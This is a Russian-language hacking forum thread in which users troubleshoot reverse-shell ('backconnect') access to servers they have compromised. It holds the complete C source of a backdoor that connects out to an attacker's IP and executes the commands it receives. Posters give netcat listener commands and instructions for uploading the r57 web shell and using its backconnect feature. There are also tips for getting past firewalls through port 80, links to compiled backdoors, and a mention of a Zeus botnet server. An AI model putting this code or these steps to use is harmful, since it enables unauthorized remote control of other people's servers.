у меня не получается использовать backconnect backdoor: беру сервер на котором с которым удаётся установить соединение через бэкдор - всё работает отключаю у себя windows firewall, антивирус запускаю: nc -l -p 13001 на сервере запускаю: gcc bd.c -o bd ./bd my_ip 13001 свой ip узнаю на сайте cmyip.com, либо из коммандной строки: ipconfig ниже код backconnect backdoor Code: /* oooo...oooo.oooooooo8.ooooooooooo .8888o..88.888........88..888..88 .88.888o88..888oooooo.....888.... .88...8888.........888....888.... o88o....88.o88oooo888....o888o... ********************************* **** Network security team ****** ********* nst.void.ru *********** ********************************* * Title: nsT BackConnect Backdoor v1.0 * Date: 09.04.2006 * Usage: * client: nc -lp 9999 * server: ./backconnect <ip_client> 9999 ********************************* */ #include <stdlib.h> #include <stdio.h> #include <error.h> #include <string.h> #include <fcntl.h> #include <sys/socket.h> #include <sys/types.h> #include <resolv.h> int main (int argc, char **argv) { struct sockaddr_in sock; int sd; char command[256]; if (argc < 3) { printf("%s <host> <port>\n", argv[0]); return 1; } close(1); if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) { perror(argv[0]); return 1; } bzero(&sock, sizeof(sock)); sock.sin_family = AF_INET; sock.sin_port = htons(atoi(argv[2])); inet_aton(argv[1], &sock.sin_addr); if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) { perror(argv[0]); return 1; } close(2); dup(sd); bzero(command, 256); while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) { system(command); bzero(command, 256); } close(sd); return 0; } ... и соединения не происходит. В чём может быть проблема? интернет через corbina, backconnect пробовал произвести на нескольких серверах - нигде не получилось. Пробовал в одном окне: nc -l -p 1234, а в другом окне: nc my_ip 1234 - всё нормально работает.
Держи другой бэкконект. http://rapidshare.com/files/223658318/back.html Скомпилированный. Не когда не подводил, всегда проканывал. use:./back your_ip nc:nc -l -p 4000 Возможно соеденение не идёт из-за фаера на серваке. Режет запросы. Если что сорцы. http://rapidshare.com/files/223659648/back.c.html
1. Залей шелл r57. Потом открой NetCat и запусти с параметром -l -n -v -p 11457 Потом в самом низу шелла r57 есть менюшка бэкконект. В поле порт вбей 11457, а в поле IP свое IP. Нажми connect. 2. Если не получается, т.е. блочит фаер. В полне возможно, что он просто блочит порты все кроме 80. Т.е. открой у себя 80 порт и пробуй на него
1) D:\nc>nc -l -n -v -p 80 listening on [any] 80 ... 2) шелл r57 -> ::Сеть:: -> back connect: IP: мой порт: 80 не получилось. пробую на этом сервере: <вырезано> Подскажите, какие ещё варианты?
krobol, через r57 попробуй на другой порт. На тот, что я привел в примере. Попробуй сам открыть порт через этот шелл. Если получиться открыть порт, то на него делай бэкконект. А чтобы делать на 80, то надо его у себя открыть сначало ЗЫ: Зачем оставлять линк, если на шелле висит авторизация? о_0
авторизация: логин: 1, пароль: 1 - я указал в скобках открывать порт через шелл и коннектится к нему у меня получается (если не здесь, то на других серверах точно получалось). А вот backconnect нигде не получается Как открыть у себя 80 порт? Если: nc -l -n -v -p 80, то так я делал.
на своём компе набрал > ipconfig ответ: corbina - PPP адаптер: DNS-суффикс этого подключения . . : IP-адрес . . . . . . . . . . . . : 93.80.84.170 Маска подсети . . . . . . . . . . : 255.255.255.255 Основной шлюз . . . . . . . . . . : 93.80.84.170 отключил firewall, антивирус и набрал: > nc -l -p 33333 затем, зашёл в unix-shell (/bin/bash) на сервер. Там оказался netcat, я набрал: $ nc 93.80.84.170 33333 и ничего не проходит. Почему? $ ping 93.80.84.170 работает помогите, пожалуйста, разобраться
Я с тебя в шоке... То ты спрашиваю, где я сделал, то блин файлообменники у него не грузятся... =\ На: http://rapidshare.com/files/223996083/netcat.rar.html
всё сделал как в видео, но у меня в netcat ничего не выдаёт, никаких ответов сервера !?!?!? почему?? после нажатия "выполнить" в шелле - в netcat ничего не происходит
Может у тебя неткат кривой? Значит скачай мой: http://rapidshare.com/files/224003205/nc.rar.html Потом запускай не через cmd, а исходник из папки запусти. Потом вбей в нем -l -n -v -p 3373 Потом в шелле тоже на порт 3373. Если же нет, то тогда хз что =(
сделал как ты написал: скачал твой netcat запустил из папки вбил -l -n -v -p 3373 в шелле тоже этот порт 3373 не получается пробовал с дедика, тоже не идёт, но с дедика в шелле пишет фразу: now script try connect to xxx.xxx.xxx.xxx port 3373 ... на мой комп даже этого не писало. у меня инет по сетевому проводу через корбину - может в этом дело? как это можно обойти? на дедике возможно дело в антивирусе (я не знаю как его отключать)
у меня есть root доступ на сервер с Linux как можно сделать на него backconnect с веб-шелла? nc присутствует, но как в windows $ nc -l не работает. Как на unix запускается nc? или какая другая программа на прослушку порта для backconnct? ________________________ всё получилось! отдельное спасибо Tigger! на удалённом unix сервере nc какой-то кривой стоит. взял архив http://www.sfr-fresh.com/unix/misc/nc110.tgz и собрал (make linux). Со сборкой тоже пришлось помучиться. Выдавало ошибку в netcat.c - функция res_init() не определена. Решил удалением части кода из netcat.c: Code: #ifdef HAVE_BIND /* can *you* say "cc -yaddayadda netcat.c -lresolv -l44bsd" on SunLOSs? */ res_init(); #endif Всё заработало как в видео Tigger. Если кто-то знает как обойти "сидение под натом" расскажите, пожалуйста.
Уважаемые Гуру! сорри что снова поднял эту тему! меня интересует так же тема backconnecta подскажите как можно организовать BC за натом ! сервер чтобы linux был организовывал bc на зевсе там сервак на win что очень не приемлемо! да глючит вся эта связка вместе! что можете предложить какие нить shell или еще что либо! - это для сервера а клиент который за NAT - ??? так же может исходники есть чтобы был прозрачен для firewall черз 80 порт или возможно переделать сервер зевса на linux? кто с этим сталкивался
